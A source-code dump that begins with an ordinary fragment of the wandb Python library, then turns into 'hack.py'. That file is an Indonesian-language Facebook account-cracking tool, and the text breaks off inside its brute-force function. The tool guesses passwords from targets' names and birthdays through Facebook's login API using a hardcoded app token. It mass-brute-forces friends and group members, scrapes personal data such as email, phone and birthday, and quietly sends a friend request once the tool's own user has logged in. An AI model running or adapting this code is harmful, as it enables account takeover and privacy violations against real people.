Run.restore.__doc__ = restore.__doc__
# py2 doesn't let us set a doc string, just pass
except AttributeError:
pass
class _LazyArtifact(ArtifactInterface):
_api: PublicApi
_instance: Optional[ArtifactInterface] = None
_future: Any
def __init__(self, api: PublicApi, future: Any):
self._api = api
self._future = future
def _assert_instance(self) -> ArtifactInterface:
if not self._instance:
raise ValueError(
"Must call wait() before accessing logged artifact properties"
)
return self._instance
def __getattr__(self, item: str) -> Any:
self._assert_instance()
return getattr(self._instance, item)
def wait(self) -> ArtifactInterface:
if not self._instance:
resp = self._future.get().response.log_artifact_response
if resp.error_message:
raise ValueError(resp.error_message)
self._instance = public.Artifact.from_id(resp.artifact_id, self._api.client)
assert isinstance(
self._instance, ArtifactInterface
), "Insufficient permissions to fetch Artifact with id {} from {}".format(
resp.artifact_id, self._api.client.app_url
)
return self._instance
@property
def id(self) -> Optional[str]:
return self._assert_instance().id
@property
def version(self) -> str:
return self._assert_instance().version
@property
def name(self) -> str:
return self._assert_instance().name
@property
def type(self) -> str:
return self._assert_instance().type
@property
def entity(self) -> str:
return self._assert_instance().entity
@property
def project(self) -> str:
return self._assert_instance().project
@property
def manifest(self) -> "ArtifactManifest":
return self._assert_instance().manifest
@property
def digest(self) -> str:
return self._assert_instance().digest
@property
def state(self) -> str:
return self._assert_instance().state
@property
def size(self) -> int:
return self._assert_instance().size
@property
def commit_hash(self) -> str:
return self._assert_instance().commit_hash
@property
def description(self) -> Optional[str]:
return self._assert_instance().description
@description.setter
def description(self, desc: Optional[str]) -> None:
self._assert_instance().description = desc
@property
def metadata(self) -> dict:
return self._assert_instance().metadata
@metadata.setter
def metadata(self, metadata: dict) -> None:
self._assert_instance().metadata = metadata
@property
def aliases(self) -> List[str]:
return self._assert_instance().aliases
@aliases.setter
def aliases(self, aliases: List[str]) -> None:
self._assert_instance().aliases = aliases
def used_by(self) -> List["wandb.apis.public.Run"]:
return self._assert_instance().used_by()
def logged_by(self) -> "wandb.apis.public.Run":
return self._assert_instance().logged_by()
# Commenting this block out since this code is unreachable since LocalArtifact
# overrides them and therefore untestable.
# Leaving behind as we may want to support these in the future.
# def new_file(self, name: str, mode: str = "w") -> Any: # TODO: Refine Type
# return self._assert_instance().new_file(name, mode)
# def add_file(
# self,
# local_path: str,
# name: Optional[str] = None,
# is_tmp: Optional[bool] = False,
# ) -> Any: # TODO: Refine Type
# return self._assert_instance().add_file(local_path, name, is_tmp)
# def add_dir(self, local_path: str, name: Optional[str] = None) -> None:
# return self._assert_instance().add_dir(local_path, name)
# def add_reference(
# self,
# uri: Union["ArtifactEntry", str],
# name: Optional[str] = None,
# checksum: bool = True,
# max_objects: Optional[int] = None,
# ) -> Any: # TODO: Refine Type
# return self._assert_instance().add_reference(uri, name, checksum, max_objects)
# def add(self, obj: "WBValue", name: str) -> Any: # TODO: Refine Type
# return self._assert_instance().add(obj, name)
def get_path(self, name: str) -> "ArtifactEntry":
return self._assert_instance().get_path(name)
def get(self, name: str) -> "WBValue":
return self._assert_instance().get(name)
def download(self, root: Optional[str] = None, recursive: bool = False) -> str:
return self._assert_instance().download(root, recursive)
def checkout(self, root: Optional[str] = None) -> str:
return self._assert_instance().checkout(root)
def verify(self, root: Optional[str] = None) -> Any:
return self._assert_instance().verify(root)
def save(self) -> None:
return self._assert_instance().save()
def delete(self) -> None:
return self._assert_instance().delete()
|
hack.py
|
#TKJ Black Hat
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br. xd(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '\x1b[1;91m[!] Keluar'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = ' MR SHSUI UCIHA HACK FB'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mSedang Masuk COK \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idteman = []
idfromteman = []
idmem = []
id = []
em = []
emfromteman = []
hp = []
hpfromteman = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mLogin Akun Facebook Heula \x1b[1;91m[\xe2\x98\x86]'
id = raw_input('\x1b[1;91m[+] \x1b[1;36mUsername FB \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mPassword FB \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak ada koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin berhasil'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
os.system('xdg-open https://youtube.com/NjankSoekamti')
time.sleep(2)
menu()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak ada koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print '\n\x1b[1;91m[!] Login Gagal'
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Tidak ada koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94' + 40 * '\xe2\x95\x90'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Nama \x1b[1;91m: \x1b[1;92m' + nama
print '\x1b[1;97m\xe2\x95\x9a' + 40 * '\xe2\x95\x90'
print '\x1b[1;37;40m1. Informasi Pengguna'
print '\x1b[1;37;40m2. Hack Akun Facebook'
print '\x1b[1;37;40m3. Bot '
print '\x1b[1;37;40m4. Lainnya.... '
print '\x1b[1;37;40m5. LogOut '
print '\x1b[1;31;40m0. Keluar '
print
pilih()
def pilih():
zedd = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if zedd == '':
print '\x1b[1;91m[!] Jangan kosong'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('rm -rf login.txt')
os.system('xdg-open https://www.youtube.com/nganunymous')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mTidak ada'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID\x1b[1;97m/\x1b[1;92mNama\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 40 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor HP\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNomor HP\x1b[1;97m : \x1b[1;91mTidak ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mTanggal Lahir\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mTanggal Lahir\x1b[1;97m : \x1b[1;91mTidak ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mTidak ada'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] Pengguna tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Mini Hack Facebook(\x1b[1;92mTarget\x1b[1;97m)'
print '\x1b[1;37;40m2. Multi Bruteforce Facebook'
print '\x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '\x1b[1;37;40m4. BruteForce(\x1b[1;92mTarget\x1b[1;97m)'
print '\x1b[1;37;40m5. Yahoo Checker'
print '\x1b[1;37;40m6. Ambil id/email/hp'
print '\x1b[1;31;40m0. Kembali'
print
hack_pilih()
def hack_pilih():
hack = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Jangan kosong'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mTidak ada'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Akun target harus berteman dengan akun anda dulu !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mMemeriksa \x1b[1;97m...')
time.sleep(2)
jalan('\x1b[1;91m[+] \x1b[1;92mMembuka keamanan \x1b[1;97m...')
time.sleep(2)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Maaf, gagal membuka password target :('
print '\x1b[1;91m[!] Cobalah dengan cara lain.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Koneksi terganggu'
time.sleep(1)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
def hasil():
print
print 40 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Gagal \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Crack dari daftar Teman'
print '\x1b[1;37;40m2. Crack dari member Grup'
print '\x1b[1;31;40m0. Kembali'
print
pilih_super()
def pilih_super():
peak = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Jangan kosong'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mJumlah ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
print
print 40 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass1
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass1
else:
pass2 = b['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass2
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass2
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass3
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass3
else:
lahir = b['birthday']
pass4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass4
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass4
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mJumlah\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
